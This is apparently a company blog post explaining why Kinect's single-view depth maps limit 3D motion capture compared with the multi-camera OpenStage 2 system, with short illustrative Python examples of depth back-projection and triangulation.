
iPi Soft and Kinect for Markerless Motion Capture?

We get questions about iPi Soft and Kinect all the time. People want to know how Kinect differs from OpenStage 2, the professional markerless motion capture system we offer, or they ask whether Kinect can be used for accurate 3D tracking. The fact is that we love Kinect for home gaming and basic gesture capture, areas where it truly excels. However, as the basis of an accurate 3D motion capture solution suitable for professional applications, it has serious limitations.

Here’s a video we did a while ago that we often point people to when they want to understand what’s really going on behind the scenes.

It all comes down to the data the system can collect and how that data is processed. In brief, Kinect works for basic gesture recognition at a very low consumer price point because it keeps the data simple. It has a 2D depth map view of the subject and software that has been trained against huge amounts of sample data. A 2D depth map means it is only looking from one angle, but, using an infrared sensor, it can tell how far away different parts of that 2D image are. In sculptural terms, you can think of its data as a bas-relief as opposed to a free-standing statue; it has depth, but only from one side. Because of this, Kinect can’t know whether anything lies behind the surface it sees or is blocked by it. But it can take the data it does get and match it against what it has learned in order to say, in effect, “that looks like a guy with his right arm raised.” It doesn’t really understand the arm’s true 3D position, its angle, and so on; it just goes with its closest guess.
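To make the bas-relief idea concrete, here is a minimal sketch in plain Python with NumPy (not Kinect SDK code; the 525-pixel focal length is a commonly quoted approximation for the original Kinect, and the tiny depth map is invented for illustration). Back-projecting a depth map yields at most one 3D point per pixel, so any surface hidden behind the nearest one along a line of sight never enters the data at all.

```python
import numpy as np

# Hypothetical 4x4 depth map (metres from the sensor): one depth value
# per pixel, as seen from a single viewpoint.
depth_map = np.array([
    [2.1, 2.1, 2.1, 2.1],
    [2.1, 1.4, 1.4, 2.1],   # e.g. an arm raised in front of the torso
    [2.1, 1.9, 1.9, 2.1],
    [2.1, 2.0, 2.0, 2.1],
])

def backproject(depth, focal_px=525.0):
    """Turn a depth map into 3D points: a 'bas-relief' shell.

    Each pixel's ray contributes exactly one point (the nearest surface),
    so occluded geometry is absent from the result, not merely noisy.
    """
    h, w = depth.shape
    cx, cy = (w - 1) / 2.0, (h - 1) / 2.0   # assume principal point at centre
    points = []
    for v in range(h):
        for u in range(w):
            z = depth[v, u]
            points.append(((u - cx) * z / focal_px,
                           (v - cy) * z / focal_px,
                           z))
    return points

pts = backproject(depth_map)
print(len(pts), "points: one per pixel, never one for the hidden side")
```

Pose recognition on top of this data can only compare the visible shell against learned examples, which is exactly the “closest guess” behavior described above.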

In order to get more out of the technology, there have been a bunch of Kinect-based hacks; in fact, the video above shows how we hacked Kinect to add our own software and additional cameras. For example, we have tried, as have many others, using multiple Kinects to get a better 3D data set. While that does improve things to some degree, it also has real limitations. With two Kinects you still don’t get a full 3D view of the subject, but rather two 2D depth maps, which are still unable to provide accurate information about blocked body parts. Adding even more Kinects doesn’t work either, because the infrared projections that each Kinect uses to collect its depth map data interfere with one another across devices. We know because we’ve tried integrating Kinects even beyond what is shown in the video above, thinking they might replace some or all of the regular cameras we use. In the end we found that, for true 3D data, multiple regular video cameras simply provide better data.

Of course, having an extra dimension to the data not only provides a huge advantage in measurement, it also multiplies the amount of data that needs to be processed. Processing all of that extra data in realtime requires sophisticated techniques. This capability, efficiently processing and understanding 3D data from multiple cameras, is at the heart of Organic Motion’s technology and the basis for the accurate tracking capabilities of OpenStage 2 and the rest of our products.
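For intuition about why multiple synchronized views pin down true 3D position, here is a sketch of classic linear (DLT) triangulation. This is a standard textbook technique, not Organic Motion’s proprietary pipeline, and the toy camera matrices and pixel coordinates below are invented for the example. Each calibrated camera’s 2D observation contributes two linear constraints on the unknown 3D point; with two or more views the point is recovered by least squares.

```python
import numpy as np

def triangulate(projections, pixels):
    """Linear (DLT) triangulation: recover one 3D point from its observed
    pixel coordinates in two or more calibrated cameras.

    Each camera contributes two rows to a homogeneous linear system
    A @ X = 0; the least-squares solution is the last right singular
    vector of A.
    """
    rows = []
    for P, (u, v) in zip(projections, pixels):
        rows.append(u * P[2] - P[0])   # constraint from the x coordinate
        rows.append(v * P[2] - P[1])   # constraint from the y coordinate
    _, _, vt = np.linalg.svd(np.array(rows))
    X = vt[-1]
    return X[:3] / X[3]                # dehomogenize

# Two toy pinhole cameras (3x4 projection matrices, unit focal length);
# the second sits one unit to the right of the first.
P1 = np.hstack([np.eye(3), np.zeros((3, 1))])
P2 = np.hstack([np.eye(3), np.array([[-1.0], [0.0], [0.0]])])

# A point at (0, 0, 4) projects to (0, 0) in camera 1 and (-0.25, 0) in
# camera 2; triangulation recovers the original 3D position.
print(triangulate([P1, P2], [(0.0, 0.0), (-0.25, 0.0)]))   # ~[0. 0. 4.]
```

The same geometry explains the occlusion advantage: a point hidden from one camera can still be constrained by the others, which a single-viewpoint depth sensor can never do.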
Here’s a video of our software in action, using just regular video cameras with no Kinect involved.  As you can see, the actors are being accurately tracked in realtime through a wide variety of complex motions.

OpenStage 2 can accurately measure 3D position, rotation, and angle based on what it sees from multiple cameras at once. This is not only more accurate, but also allows it to track many types of motion that Kinect and similar solutions cannot. For example, poses where part of the body is occluded (blocked) from the Kinect’s perspective can never be tracked well without 3D data. Similar problems occur when the subject turns away from the camera or spins around, positions for which the Kinect software has presumably not been trained. Tracking multiple people is also only practical with real 3D data; otherwise it is impossible to tell what is going on when one subject steps in front of the other.

To see for yourself how good OpenStage 2’s tracking data is, check out these free motion capture data samples.